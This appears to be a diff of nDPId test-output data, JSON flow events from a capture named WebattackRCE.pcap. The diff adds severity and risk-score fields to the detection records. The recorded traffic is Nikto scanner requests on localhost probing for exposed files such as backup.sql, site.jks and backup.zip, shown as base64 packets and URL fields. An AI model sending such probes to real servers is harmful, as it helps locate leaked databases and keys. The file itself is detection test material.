 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
